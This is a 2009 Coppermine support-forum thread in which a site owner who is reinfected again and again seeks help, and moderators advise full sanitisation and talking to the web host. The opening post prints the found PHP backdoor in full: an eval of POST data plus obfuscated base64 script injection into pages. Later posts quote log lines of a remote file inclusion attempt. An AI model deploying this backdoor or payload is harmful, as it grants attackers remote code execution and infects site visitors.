forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: ksxj on March 29, 2009, 09:32:08 am

Title: hacked
Post by: ksxj on March 29, 2009, 09:32:08 am
I have tried checking the databases for unknown admin accounts and don't see anything. 
I tried to delete all files and copy my backup files back over.
I tried reinstalling from scratch.
But about 5min - 30 hrs after I open the directory back up to the public it gets hacked again.

Has anyone else had this problem?
could really use some help!!!!!!!

It messes up my phpbb files, myphpadmin files, and coppermine files.

Code: [Select]

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdncyUzQ0N4c09KMGNyaXB0JTIwc3JjJTNEZ3MlMkYwd2UlMkZuZzlnczRoVWglMkVoVWgyNDclMkUyalhUJTJFbmcxT0owOTVDeCUyRmhVaGpxT0owdWVyQ3h5Q3glMkVqc25nJTNFJTNDbmclMkZzY3JqWFRpcGhVaHRncyUzRScpLnJlcGxhY2UoL2hVaHxqWFR8Z3N8c1Z8MHdlfEN4fE9KMHxuZy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


Title: Re: hacked
Post by: Phill Luckhurst on March 29, 2009, 11:45:54 am
A link to your site would help.

Are you using the latest versions of all the software you have installed?

Have you done a full scan of your setup and all the files in there?

Have you read the yikes, I've been hacked thread?

http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
Title: Re: hacked
Post by: ksxj on March 29, 2009, 12:33:34 pm


the site is www.kamojeepclub.org and my personal site www.larsons.info


But I have taken the site down.  Trying to fix it.  But yes I did a fresh install with all of the newest versions.  It took 5 minutes for it to be hacked.  And yes I read that forum.
Title: Re: hacked
Post by: Joachim Müller on March 29, 2009, 01:33:31 pm
Just performing a fresh install won't help. As suggested in the Yikes thread, you need to sanitize your entire site. This includes closing all possible backdoors and loopholes. Usually, attackers don't leave and admin account behind inside the database, as that's quite obvious to figure and and to fix. More elegantly they hide a little script that let's them take over your site again in a file that looks innocent. They usually hide that file outside of the folder that contains the app that let them get in in the first place. It's quite likely that that backdoor they use doesn't reside in your coppermine folder. Therefor, your fresh installs won't accomplish anything good.
I'm sorry, but this is something you can't really expect our help with: as suggested in the Yikes-thread, you're welcome to try to sanitize for yourself. If this doesn't help, ask your webhost for support. If this doesn't help, hire a pro. It's really beyond the scope of free support to clean your hacked site. It's beyond the scope of this site as well to explain to your what hackers do to infest your site - even if we would be ready to post such instructions, wannabe script kiddies would benefit more from such instructions than you as site owner (who usually doesn't have any hacking skills, which is understandable and fine).
I can understand that this might sound frustrating for you, but you have to understand that we simply can not help you more with this.
In the future, please use better subjects for your postings.
Title: Re: hacked
Post by: ksxj on March 30, 2009, 08:44:53 pm
what do you consider sanatizing my entire site.  I deleted every file and folder and started a fresh install from scratch.  Then double checked that all the permissions on the folders and files where correct.   Just got done doing it that for the second time yesterday.  My site was hacked again sometime today.
Title: Re: hacked
Post by: Phill Luckhurst on March 30, 2009, 08:53:38 pm
When you say you sanitised the entire site, do you mean every file including phpbb and myphpadmin? Have you upgraded those to tha latest version too? Have you checked through all the files in your album folders for malicious scripts?

The best bet would be to ask your host to check the server logs. They should be able to see where the scumbags got in and what changes they have made.
Title: Re: hacked
Post by: ksxj on March 30, 2009, 09:57:13 pm
on either yahoo or godaddy I don't get the choice of version of phpmyadmin.  Plus they both say it will take a courts supena to get the access log file.  I have my access logs setup but they are not descriptive enough.  But yes I deleted every html, php file off my server and then reinstalled and double checked permissions on each file.
Title: Re: hacked
Post by: Joachim Müller on March 31, 2009, 08:32:41 am
What do you consider a re-install? Your site looks pretty customized to me - it's not a just a vanilla install. At least the forum theme must come from somewhere - from a copy on your hard-drive ideally. Can't say anything about your gallery, as you require visitors to log in. The gallery certainly isn't a fresh install neither - as you have indexes on (which is a very bad thing in terms of security) I was able to browse your albums folder (http://www.kamojeepclub.org/gallery/albums/) and spot that there are loads of sub-folders and files. All script kiddies are obviously welcome to browse your page - that's like saying "hackers welcome" at the front door. Did you actuall read the Yikes-thread and do as suggested? I don't think so: it looks like you haven't sanitized nor have you re-installed properly - a re-install would mean an empty slate and not a populated gallery and forum. Look like you re-added the hack by restoring the files or not deleting them in the first place. As suggested in the Yikes-thread: you need to sanitize your site, which is a time-consuming job.
Title: Re: hacked
Post by: ksxj on March 31, 2009, 03:35:07 pm
what do you mean by?
 as you have indexes on (which is a very bad thing in terms of security)


It is a fresh install. I reinstalled all those addins, custom settings and all and uploaded all new img files while it was still up and running.  I stayed up all night to get it done but I did do it.  now for the albums folder, I didn't realize that.  It was not that way the first time I got hacked though.  Which brings up why I am posting this.  I just want to know how they got in and continually getting in.  Just getting real frustrated and need some assistance.
Title: Re: hacked
Post by: ksxj on March 31, 2009, 03:41:04 pm
Oh I consider a fresh install to be where I download the ost updated version of code from this site and used my ftp program and told it to install. 
Title: Re: hacked
Post by: Phill Luckhurst on March 31, 2009, 04:05:42 pm
It is impossible for us to know how they got in. It might have been through coppermine but could be through so many other ways including problems with your hosting. I have seen hosts have an entire server full of users get hacked when they get in through one user which might not be you. You also have other applications on your system that could have allowed the hackers in.

The only way to be sure is to check the logs or ask your host to explain how they got in. If your host is unwilling to do that then maybe you should consider alternative options. By not telling you they are compromising their system so it is in their best interests to help.

Title: Re: hacked
Post by: Joachim Müller on April 01, 2009, 09:17:05 am
Indexes being on is not related to coppermine. Please google for it or ask your webhost.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:03:13 pm
so its happened again!!!!!!!!!!!

found these in my log file.  Is this how they are getting in?

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

founds some interesting reading on ppa_root_path

http://anonymousite.altervista.org/wordpress/2008/09/01/20/

http://www.securityfocus.com/bid/14209/exploit

http://www.geocities.com/hsia_joe/Tutorial.txt

Can someone please help me???!!!!!
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:05:44 pm
another site

http://www.vupen.com/english/advisories/2006/3842

Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:28:26 pm
Those are vulnerabilities in other applications.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:30:10 pm
then why are they using it in my site with your software installed???

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"


Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:31:25 pm
It's an automatic attack. You don't have that software installed so it fails. That's what the log message is telling you: 404 - file not found.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:38:06 pm
thanks that makes more sense.


But I still don't understand how they are getting into my site and inserting code! 
Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:40:41 pm
Make sure your gallery is up to date and fully sanitised.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 09:03:35 pm
I know that is your first response but I have done that mult times now and has not fixed the issue. 
Title: Re: hacked
Post by: ksxj on April 09, 2009, 09:33:57 pm
Nibbler - would you be willing to ftp into my account and confirm that I sanatized so I can stop getting that question? 
Thanks
Title: Re: hacked
Post by: Nibbler on April 09, 2009, 09:40:39 pm
OK. PM me.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 10:05:39 pm
OK. PM me.

just did - thanks
Title: Re: hacked
Post by: ksxj on April 10, 2009, 04:29:49 pm
@ksxj: stop butting in - I have already replied to another thread where you told people to visit your thread (http://forum.coppermine-gallery.net/index.php/topic,58903.msg290476.html#msg290476). To make this clear: you have not understood the concept behind cleaning and sanitizing as suggested in the Yikes thread. You insist that there is something else people need to do, which is not the case.

@thread starter: ignore ksxj. Do as suggested in the Yikes thread (http://forum.coppermine-gallery.net/index.php/topic,51927.0.html).

wow, just trying to help and see if there are others with the same issue. 

I agree that yikes thread is very helpfull and great start.  I am just using this forum what it is for.  Joining people with the same interestes and to help each other if our paths cross. How are we supposed to know if we are not allowed to discuss such things? 

And you say I did not sanatize my site.  Woudln't deleting all files and reinstalling from scratch count as sanatizing?
Title: Re: hacked
Post by: Joachim Müller on April 11, 2009, 09:41:25 am
If you really delete all files (even the ones outside the path of coppermine) and if you don't forget to clean the database as well, then yes: this would count as extreme sanitization, or rather an extermination. But that's not what you said you did in "your" thread. The things you did or did not perform should however not be discussed in this thread, but inside your thread. In other words: please stay out of this thread with your issues.
Title: Re: hacked
Post by: ksxj on April 11, 2009, 06:21:29 pm
I am really needing help and you want me to stay out of my own thread.  I undestand you want me out of other people thread but by my own?


Well it hasn't even been a day since I completly deleted all my files except the .jpg's and reloaded my gallery and forum from scratch.  I didn't even have time to reinstall my my gallery theme or any of the mods I have done in the past.  Can someone please help me?!?!?!?!?!?!?!?!?
Title: Re: hacked
Post by: Phill Luckhurst on April 11, 2009, 08:16:43 pm
I think you missunderstood. I believe Joachim wants you to keep out of the other threads and keep your questions to your own.

Did you delete all of your other files such a phpbb etc?
Title: Re: hacked
Post by: Joachim Müller on April 11, 2009, 08:56:41 pm
deleted all my files except the .jpg's
Are you sure the jpeg files are clean?

I believe Joachim wants you to keep out of the other threads and keep your questions to your own.
Exactly. Thanks for the clarification. Sorry if have haven't expressed clearly enough what I meant.
Title: Re: hacked
Post by: ksxj on April 12, 2009, 02:57:32 am
Are you sure the jpeg files are clean?

How do I check that?  They open ok when you go to them.  Is there another way to check?
Title: Re: hacked
Post by: ksxj on April 12, 2009, 02:58:27 am
Did you delete all of your other files such a phpbb etc?


I deleted everything.  Even my myphpadmin console files and reinstalled everything. 
Title: Re: hacked
Post by: Joachim Müller on April 13, 2009, 09:09:23 am
A possible reason for re-infection are entire servers on shared webhsoting, where the individual accounts are not shielded properly one against the other. I suggest you talk to your webhost as well. Maybe they can shed some light as well on the attack pattern by reviewing their access logs.
As far as I can see, you haven't posted a link to your gallery so far. Would be a good idea to do so now.
Title: Re: hacked
Post by: ksxj on May 08, 2009, 04:09:18 pm
Ok, so I was hacked again this week.  I have been running to sites.  One was just phpbb3 without coppermine for 3 weeks without coppermine.  The other just coppermine. One week after I added coppermine it happened and now it has gotten my just coppermine site.  So I know it is coppermine. 

But now I think it has a name cause my work is comes up blocking "gumblar.cn" when I go to my websites.
Title: Re: hacked
Post by: Joachim Müller on May 08, 2009, 04:57:05 pm
Re-infections can happen as well if the webspace hasn't been sanitized properly or if outdated software was used. Since you haven't elaborated, there's no saying if it's really the case that coppermine is to blame. Anyway, with so little detail, it's just crying "thief". Not a bright idea. If you want help, post details. If you just came here to blame others, then please stop it.
Title: Re: hacked
Post by: ksxj on May 08, 2009, 05:32:34 pm
wow, I am posting my findings as I go, so maybe someone else can read this or stumble accross it if they are having the same issue.  Isn't this what the forum is for???  I am not mad or upset with anyone on this site or blaming anyone on this site. 

It looks like it is not just coppermine but other php based forums/scripts as well.  Looks like they can affect your personal computer and then use your ftp program to find out usernames and passwords for your sites.  But again this is my findings so far, so if you know anything else please share with me and others so we can maybe get a handle on it.



Title: Re: hacked
Post by: Joachim Müller on May 09, 2009, 02:37:40 pm
Well, you blamed coppermine:
So I know it is coppermine. 
and I replied that you can't be sure.
What else do you expect.